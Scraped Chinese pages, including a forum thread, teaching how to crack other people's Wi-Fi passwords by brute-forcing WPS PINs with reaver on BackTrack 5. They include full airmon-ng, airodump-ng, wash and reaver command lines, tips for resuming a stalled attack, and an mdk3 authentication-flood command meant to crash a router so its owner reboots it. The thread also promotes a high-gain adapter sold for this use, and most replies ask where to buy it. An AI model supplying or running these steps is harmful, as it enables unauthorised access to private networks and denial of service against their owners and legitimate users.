精解reaver用BT5成功PIN解码
PIN码破密特点：
1、不需要客户端
2、有PIN码就能获得无线密码
3、八位数PIN码实际只有一万一千组随机密码
4、抓包、EWSA跑包，每个环节都有很大的不确定性，而PIN破密，只要开户WPS，破密只是个时间问题。
提醒：只限于个人测试使用，由于非法操作引起的相关法律责任与本作者无关。
reaver使用方法、步骤：
1、打开超级终端 ROOt shell&&
2、如果电脑装有多个无线网卡，请先发指令
3、ifconfig -a
4、确认你用哪一个网卡WLAN0或WLAN1
下面的指令都是以单一网卡WLAN0为例
一、激活监听模式：
airmon-ng start wlan0
二、查看周边AP信息（抓包）：
airodump-ng&&mon0
wash -i mon0 -C
观察要破AP的PWR信号强弱变化，注意同频干扰，调整网卡放置位置和角度、方向。
PWR 小于 -75 基本上会Timeout, PWR-60左右,则非常顺畅(2-6秒攻击一次)
三、按Ctrl+C终止抓包
四、 抓PIN码：
reaver -i mon0 -b MAC&&-vv
reaver -i mon0 -b C8:3A:35:F6:BB:B8 -vv -a -S -d 0 -t 1
1.4版可用：
reaver -i mon0 -b C8:3A:35:F6:BB:B8 -v& &（可用一个v）
注意，MAC中冒号不可省略，MAC地址的字母大小写均可， -vv是两个V不是W！
特别提示：
只有AP开启了WPS、QSS功能，才可以用PIN法破PSK密码!
如何查看AP是否开了WPS、QSS呢？
一、使用指令:
airodump-ng&&mon0
MB一栏下，出现&&<font color="#e. （看清楚有点&.&）是开WPS的
AP关闭了WPS、或者没有QSS滴，会出现
WARNING: Failed to associate with XX:XX:XX:XX:XX:XX&&(ESSID: XXXX)
PIN破密对信号要求极为严格,如果信号稍差，可能导致破密进度变慢或者路由死锁等（重复同一个PIN码或 timeout）,特别是1、6默认频道中，有较多的AP，相互干扰,因此，确定网卡放置的最佳位置、方向、角度十分重要。
破解过程中 ，重复同一个PIN码 或 timeout 可随时随地按Ctrl+C终止，reaver会自动保存进度。
重复第2-4项内容，先看看AP信号强弱或是否关机，若继续破，则再次在终端中发送:
reaver -i mon0 -b MAC -vv
当reaver确定前4位PIN密码后，其工作完成任务进度数值将直接跳跃至90.9%以上，也就是说只剩余一千个密码组合了。总共一万一千个密码。
曙光就在前头，胜利往往在再坚持一下的努力之中。
如果，90.9%进程后死机或停机，请记下PIN前四位数，用指令：
reaver -i mon0 -b MAC -a -vv -p XXXX(PIN前四位数)
会从指定PIN段起破密。
额外：（假如pin死了，就用命令强制让重启）
首先检测网卡：
ifconfig -a
然后模拟端口：
airmon-ng start wlan0
接下来用：
airodump-ng mon0 & //扫描ap找到你pin死的路由器mac
用mdk3 做身份验证攻击
mdk3 mon0 a -a mac（被pin死的路由器的mac）
身份验证攻击效果说明：
此攻击是针对无线AP的洪水攻击，又叫做身份验证攻击。其原理就是向AP发动大量的虚假的链接请求，这种请求数量一旦超过了无线AP所能承受的范围，AP就会自动断开现有链接，使合法用户无法使用无线网络。迫使路由主人重启路由器。
此命令功能强大，使用错误会造成所有ap不能使用，请指定mac地址，然后使用，其余命令不要乱试。你要使用此命令的其他参数，请详细此命令参数详解。
此操作会让路由器完全宕机，不但无线不能用，有线的也连接不了，必须重启路由器！
请谨慎使用！
您对本文章有什么意见或着疑问吗？请到您的关注和建议是我们前行的参考和动力&&
您的浏览器不支持嵌入式框架，或者当前配置为不显示嵌入式框架。bt3 bt4 bt5 bt3 bt4 bt5 bt6 bt4和bt5 bt3和bt4 bt3 bt4 beini bt4 bt5 bt3 bt4 ..
扫扫二维码，随身浏览文档
手机或平板扫扫即可继续访问
bt3 bt4 bt5 使用教程大全
举报该文档为侵权文档。
举报该文档含有违规或不良信息。
反馈该文档无法正常浏览。
举报该文档为重复文档。
推荐理由：
将文档分享至：
分享完整地址
文档地址：
粘贴到BBS或博客
flash地址：
支持嵌入FLASH地址的网站使用
html代码：
&embed src='/DocinViewer-4.swf' width='100%' height='600' type=application/x-shockwave-flash ALLOWFULLSCREEN='true' ALLOWSCRIPTACCESS='always'&&/embed&
450px*300px480px*400px650px*490px
支持嵌入HTML代码的网站使用
您的内容已经提交成功
您所提交的内容需要审核后才能发布，请您等待！
3秒自动关闭窗口怎样用BT5抓包_百度知道
怎样用BT5抓包
怎样用BT5抓包
其他类似问题
抓包的相关知识
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁查看: 35861|回复: 85
不需抓包跑字典!freewifi自带的最新BT10软件破解WAP2密码图文详解
下载分-31 分
原创币0 点
下载次数0 次
上传次数0 次
主题帖子积分
会员等级：
小小白, 积分 2, 距离下一级还需 8 积分
前言： ! C3 p( b, N) ?( x
& && && &&&freewifi无线卡王专门配置的最新BT10软件包含一个PIN穷举软件.专门针对目前难破的WPA/WAP2密码. PIN 码分前4 和后4，先破前4 只有最多一万个组合，破后4 中的前3 只有一千个组合，一共就是一万一千个密码组合。 10 的4 次方+10 的3 次方=11000 个密码组合。
& && && &当reaver 确定前4 位PIN 密码后，其任务进度数值将直接跳跃至90.9%以上，也就是说只剩余一千个密码组合了。
& && && &总共一万一千个密码!所以PJ时间要比穷举WPA密码要短得多，也不怕它的密码是多么复杂（字母+符号+数字组合密码是其他PJ软件无法破出来的）
PIN穷举破解软件成功率相当高，但它有一个小小的缺点：所破解的信号要求很好，如果信号不好就很容易断线，是破不了的；信号好就很容易成功破解___后面提高到的PJ是破解的意思。. T/ V5 X% t( j( Q3 ~) s
& && &&&因此，使用该软件破密码，建议你选用信号接收好的.虽然贵一点但破了PIN码几乎可以一直用,一般情况下也不怕它改动密码.我就是使用的目前据说是实际接收能力最好的freewifi7066E（加强版），这是freewifi无线卡王最好的一个型号。一般同类产品实际接收距离是400~600米，这个型号实际接收距离850米,穿墙能力也最好(实际测试能穿最多5面墙,以前买的只能最多穿3面墙)。
& && &&&很多弱信号freewifi7066E它都能快速连接上，信号也很稳定，由此可见其接收能力了。这个型号尤其适合郊区或偏远地区信号少或信号很弱的用户使用。我就是用这个无线卡王按以下方法破了好几个WPA密码 。&&I0 V&&o% ~% C- F
一， 安装好8187L驱动程序，重启电脑后插入freewifi7066E。 打开8187管理软件，找到开启了WPS或QSS的无线路由信号（没开启的信号是无法利用本软件破密码的）。方法如下： A)XP系统下,选wi-fi protect setup ,点PIN按钮,特定AP选“是”
& & & & & & & & & & & & & & & &
6 r3 ^; E4 ^, @! \1 o
& & & & & & & & & & & & & & & &
* p% l3 y5 o9 X* x! g5 Y, j
' w1 B% A) S9 i6 n9 e% }) N% h
& & & & & & & & & & & & & & & &
9 v- u4 I* Y+ d0 M
&&{0 z&&r0 P& ]7 s9 U
8 `2 Y2 I, a2 y: X
B,WIN7系统下, 在input pin from ap前面打勾, 点PIN输入配置, 弹出的窗口里选择配置无线网络,就得到了开启了WPS或QSS的无线路由信号0 Y% X( L: x! j
: l+ q& N. Q&&K- M- M; b
& & & & & & & & & & & & & & & &
( F4 q* N/ q0 B
& & & & & & & & & & & & & & & &
( b- Y5 h/ Y- z8 b" i) n
2 Y; M" ]: B3 y% a- {' W$ [: [8 |
截图保存最后一个图片。要完整的MAC地址哦。这些信号都是开通了WPS的信号。记录了它的MAC地址和信号名称
二,安装虚拟机并加载小胖ISO文件. 具体的就不用写怎么弄了吧.
; p# D- H+ ]$ _
三， 运行虚拟机进入小胖系统。插入freewifi无线卡王到电脑USB口。在虚拟机里做以下操作（否则会提示找不到网卡！！！！！！！）： 虚拟机___可移动设备____USB设备____REALTEK USB设备选项前面要打一个勾才行.方法是,点击& REALTEK USB设备（或有Realtek RTL8187字样的项目）——与主机连接或断开连接&,提示你要移出USB设备吗?的对话框,选择确定.然后过十秒种后系统会提示你发现新硬件,如果有提示你要安装程序，按提示选择自动安装。没提示安装就不管，再返回去看看虚拟机___可移动设备____USB设备____REALTEK USB设备选项前面,是否有勾了?如果有,那么就可以了.- T! {, t' i4 n+ O+ z+ y
四， 打开root Shell 窗口图标&&x! V3 ]$ u. j1 r
& & & & & & & & & & & & & & & &
在命令行里敲入第一条命令“ifconfig wlan0 up” 加载freewifi无线卡王(如下图)+ ?( Z' e. }# Z
5 F" N$ ]! x/ _% o
& & & & & & & & & & & & & & & &
$ f! z1 [( ^. k. _4 `1 v" w5 N' L
注:如果出现operation not possible due to RF-kill，请按以下方法做： 拔下freewifi无线卡W，等上大概10 几秒把再插上，连续插拔几次(3~10次差不多.少数时候更多次数)，总有一次会好。（每次插上后要看虚拟机___可移动设备____USB设备____REALTEK USB设备选项前面是否有勾？必须要有勾。然后每次插上后都输入ifconfig wlan0 up 重新加载freewifi无线卡W.否则系统会提示No such Device）4 P" ~4 O6 A; q( F& k
- ]. m& X! ]3 I0 }+ U1 \
2 X' F" }2 ]3 L4 c
& & & & & & & & & & & & & & & &
1 h9 H, A: J3 w! G; C6 h
5 O) V+ w6 H% I9 Y& v2 G% D
上图看到了吗?第一次加载失败,第二次忘记插拔后打勾,第三次又加载失败,第四次才成功.成功后就没有错误提示,而是出现新的命令提示行,等你输入第二条命令
6 E: W& b3 @: d. f
五，接下来输入第二条命令 “airmon-ng start wlan0”载入
# Q7 L9 F% Z: z: y+ \; w
& & & & & & & & & & & & & & & &
% {6 M+ q&&Q/ i9 x6 F6 P) Z4 N
# E( ^# R& e# _2 ^" {& N8 [% J* k
六，输入第三条命令：airodump-ng mon0 搜索周围的无线路由信号 1 C3 n. \" A" N; G9 t: M
七，输入命令：reaver -i mon0 -b MAC -a -S –vv 开始PJ了。。。。
& && &如果目标信号非常好使用这个命令: reaver -i mon0 -b MAC -a -S -vv –d 0 备注:-d 0这个参数可以加速PJ。但如果信号不好使用这个参数，就容易把路由攻击死机，此参数慎用！！！ reaver命令和-i mon0 -b MAC -a -S –vv等参数之间都有一个空格,2个小写的V之间没空格.
& && & 注：1) -S是大写，-vv是小写的2个v（不是W）。命令参数前后都有一个空格。MAC代表你第一步收到的WPS信号的具体Mac地址（要破密码的那个信号的具体Mac地址,比如E0:05:65:05:65:65 地址里面要有冒号,不分大小写）
& && && && && &2) 信号弱很容易出现time out或重复某一个PIN(比如总是循环)。此时调整一下天线位置使信号最好。如果一直都不行，你只能改天再试。4 U7 e( r6 Y+ @$ w4 U
& && && && & 3)如果PJ中重复同一个PIN 码 或提示 timeout ，可按Ctrl+C 终止PJ，reaver会自动保存进度。然后调试天线方向使信号变强以后再重新PJ（我是一只手举着天线一边观察是否能继续PJ？如果可以，然后再找个什么东西把天线固定在那个位置）) {# H) r&&Y6 ^
& && && && &4)可以随时按Ctrl+C 终止PJ，而后按光标上下箭头重复以往命令后继续开始PJ（虚拟机不能关闭，否则上下箭头不起作用，除非你按虚拟机的暂停键保存了进度，参考第14，15步）。
& && && && & 5) 如果提示WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: XXXX).这是没有和无线路由联系上的意思.请等大约3分钟如果还没联系上,则关闭Root shell窗口拔掉freewifi无线卡W,再插上freewifi无线卡W,从第4步重新操作.6 V, O2 Q' h$ ?( P2 W/ E' n
& && && &&&以下是正常PJ状态下的画面(你看到PIN 后面的那个数字如果在变动,每隔一会还出现一个百分比的进度显示,那恭喜你,说明PJ正在正常运行,等耐心等待) . Z" j, j1 i# o$ T/ J&&?! |2 S. o
- f$ Q% g* F' _8 T, S% Q
. H4 l/ c&&L2 m8 U5 W3 ?7 k' i
& & & & & & & & & & & & & & & &
7 n9 i/ t/ {5 U- `
九，选择||暂停虚拟机保存当前的进度。(随时都可以暂停保存进度并关机以后再继续接着PJ)
& & & & & & & & & & & & & & & &
7 |$ S1 m2 D( e( l
8 y7 y$ d: M8 n1 p2 C7 k9 ?: t
. t& {; f6 S) O' }, W6 F
十， 重新打开虚拟机PJ软件，然后选择“恢复虚拟机”进入PJ系统。
& & & & & & & & & & & & & & & &
; H# @1 ~! l, a' `* `5 o* b
备注：也可以再关闭虚拟机终止PJ前，把/usr/local/etc/reaver/MAC地址.wpc文件复制到U盘，下次重新PJ时候把该文件再复制替换/usr/local/etc/reaver/MAC地址.wpc，系统就会从上次的进程接着继续PJ(篇幅有限,这里就不说了)。
十一， 重复第3~8步开始PJ。 按光标的上、下键 可以自动显示之前操作过的命令记录，选择回车就可以直接运行该命令。
9 Z3 h, }4 ~$ M+ V( i. [
十二，如果到90.9%进程死机或停机 当reaver 确定前4 位PIN 密码后，其工作完成任务进度数值将直接跳跃至90.9% 请记下PIN 前四位数， 输入指令：reaver -i mon0 -b MAC -a -vv -p XXXX(PIN 前四位数)，会从指定PIN 段起破密。 注：有人说加一个-n参数可以避开软件的BUG。大家先加一个-n参数试一下，reaver -i mon0 -b MAC -a –vv -n -p XXXX(PIN 前四位数)
. o: X2 l! L0 ]0 p- w
十三，如果进度到99.9%后，AP 死机 可打开WPS文件，总共1000个3 位数，找出剩余的十几个PIN 码，安装一个PIN驱动软件后逐个测试剩下的那十几个PIN码(WIN7系统不用安装PIN软件,XP系统下测试PIN的方法参考《WinXP系统利用PIN上网教程》)。 如果是跑了99.99%死机, 意味吗？ 你懂的吧？ 最后一个PIN 就是 注：如果你不懂，就使用第17步方法从指定PIN 段起重新破密。很多人是这么做的。
十四，正确PJ成功后的画面7 e: i2 s7 [6 f. |, J7 {% [( c) b
3 G$ ?# l% |&&R0 Z) H: y
& & & & & & & & & & & & & & & &
' c7 q6 Y) X2 i/ }
* Y) w* }6 _, t8 J&&@( k! ~
WPS PIN后面的数字是PIN码。用它就能直接上网。 WPA PSK后面的数字是无线路由加密密码，也能上网。
5 x8 M* v1 Q: [
总结： 6 p# n, w9 N/ Y- ]8 M+ e
& && && &一般需要几个晚上才能破，除非运气很好，能0.5~1小时。如果信号好的话,并且有一点点小运气,2-4 小时内就能出密码.
& && &&&PIN码破出来以后就在第一步里输入PIN直接连网，不需要知道对方的WPA密码也行。即使对方更改了密码，一样不受影响，因为PIN码是固定的。 当reaver 确定前4 位PIN 密码后，其工作完成任务进度数值将直接跳跃至90.9%以上，也就是说只剩余一千个密码组合了（总共一万一千个密码）。这个时候离成功就差一步之遥了，坚持住哦！！！
[]： gzqiaoyu发帖时，被一袋子钱砸在头上， 赚了 1 分 下载分.
下载分194 分
原创币1 点
下载次数409 次
上传次数361 次
主题帖子积分
会员等级：
银牌维客, 积分 317, 距离下一级还需 83 积分
软件在哪里下载呢？
下载分966 分
原创币0 点
下载次数174 次
上传次数2 次
主题帖子积分
会员等级：
正式维客, 积分 115, 距离下一级还需 5 积分
已用过，很好用
下载分49 分
原创币5 点
下载次数541 次
上传次数84 次
主题帖子积分
会员等级：
正式维客, 积分 93, 距离下一级还需 27 积分
PIN现在也不行了。很多新路由都防PIN了。。一直用虚拟机装CDlniux 水滴抓包 PIN破解7.8个了目前够用的了。
下载分-44 分
原创币0 点
下载次数0 次
上传次数2 次
主题帖子积分
会员等级：
准小白, 积分 -1, 距离下一级还需 1 积分
软件在哪里下载呢？
下载分-31 分
原创币0 点
下载次数0 次
上传次数0 次
主题帖子积分
会员等级：
小小白, 积分 2, 距离下一级还需 8 积分
shuai7boy7 发表于
软件在哪里下载呢？2 W&&X& C( |2 u% j
购买freewifi7066E无线卡王有赠送光盘软件啊
下载分-31 分
原创币0 点
下载次数0 次
上传次数0 次
主题帖子积分
会员等级：
小小白, 积分 2, 距离下一级还需 8 积分
zhuaiwei7531 发表于
PIN现在也不行了。很多新路由都防PIN了。。一直用虚拟机装CDlniux 水滴抓包 PIN破解7.8个了目前够用的了。
目前没有那么多限制.不然,这个东西就不用卖啦
下载分-31 分
原创币0 点
下载次数0 次
上传次数0 次
主题帖子积分
会员等级：
小小白, 积分 2, 距离下一级还需 8 积分
WPS PIN后面的数字是PIN码。用它就能直接上网。 WPA PSK后面的数字是无线路由加密密码，也能上网。
下载分-31 分
原创币0 点
下载次数0 次
上传次数0 次
主题帖子积分
会员等级：
小小白, 积分 2, 距离下一级还需 8 积分
很多路由用这个软件都容易破
下载分-31 分
原创币0 点
下载次数0 次
上传次数0 次
主题帖子积分
会员等级：
小小白, 积分 2, 距离下一级还需 8 积分
如果提示WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: XXXX).这是没有和无线路由联系上的意思.请等大约3分钟如果还没联系上,则关闭Root shell窗口拔掉freewifi无线卡W,再插上freewifi无线卡W,从第4步重新操作
下载分335 分
原创币0 点
下载次数5 次
上传次数4 次
主题帖子积分
会员等级：
初学乍练, 积分 29, 距离下一级还需 1 积分
现在大家把WPS功能都关了，楼主办法没用了
下载分-31 分
原创币0 点
下载次数0 次
上传次数0 次
主题帖子积分
会员等级：
小小白, 积分 2, 距离下一级还需 8 积分
wyl527 发表于
现在大家把WPS功能都关了，楼主办法没用了
这个是不可能.如同你说大家都不要用无线路由器了,这个更彻底,实际做不到的.再说,没WPS的可以抓包跑字典去破
下载分-31 分
原创币0 点
下载次数0 次
上传次数0 次
主题帖子积分
会员等级：
小小白, 积分 2, 距离下一级还需 8 积分
,矛与盾互相升级,相互促进.有更好的防止破解方式,就一定会有更好的破解软件出来
下载分6 分
原创币0 点
下载次数166 次
上传次数1 次
主题帖子积分
会员等级：
见习维客, 积分 39, 距离下一级还需 31 积分
坚决打击这种不道德蹭网行为。。。。
下载分-62 分
原创币0 点
下载次数0 次
上传次数0 次
主题帖子积分
会员等级：
准小白, 积分 -3, 距离下一级还需 3 积分
gzqiaoyu 发表于
18:31 ' K3 I2 H) I! g
购买freewifi7066E无线卡王有赠送光盘软件啊5 L% z. k9 D4 g3 S# [, C' p
在哪买？？？？？？？？？？？？？？？？？？？？
下载分940 分
原创币0 点
下载次数36 次
上传次数1 次
主题帖子积分
会员等级：
正式维客, 积分 106, 距离下一级还需 14 积分
很多路由都不用WPS 了
下载分-31 分
原创币0 点
下载次数0 次
上传次数0 次
主题帖子积分
会员等级：
小小白, 积分 2, 距离下一级还需 8 积分
如果目标信号非常好使用这个命令: reaver -i mon0 -b MAC -a -S -vv –d 0 备注:-d 0这个参数可以加速PJ。但如果信号不好使用这个参数，就容易把路由攻击死机，此参数慎用！！！ reaver命令和-i mon0 -b MAC -a -S –vv等参数之间都有一个空格,2个小写的V之间没空格.2 A# ~. F&&N4 Q" P& i9 M" f- U
下载分46 分
原创币0 点
下载次数1 次
上传次数0 次
主题帖子积分
会员等级：
小小白, 积分 8, 距离下一级还需 2 积分
都到BT10啦？我还停留在BT5上面
下载分-56 分
原创币0 点
下载次数0 次
上传次数0 次
主题帖子积分
会员等级：
准小白, 积分 -2, 距离下一级还需 2 积分
果然安全与便捷是矛盾体啊。
下载分-31 分
原创币0 点
下载次数0 次
上传次数0 次
主题帖子积分
会员等级：
小小白, 积分 2, 距离下一级还需 8 积分
遇到破解停顿就等5~10分钟.如果不继续破,就多次插拔卡王从头来,一般就会继续破了
Powered by Discuz! X3.1 -wLicensed
Comsenz Inc.}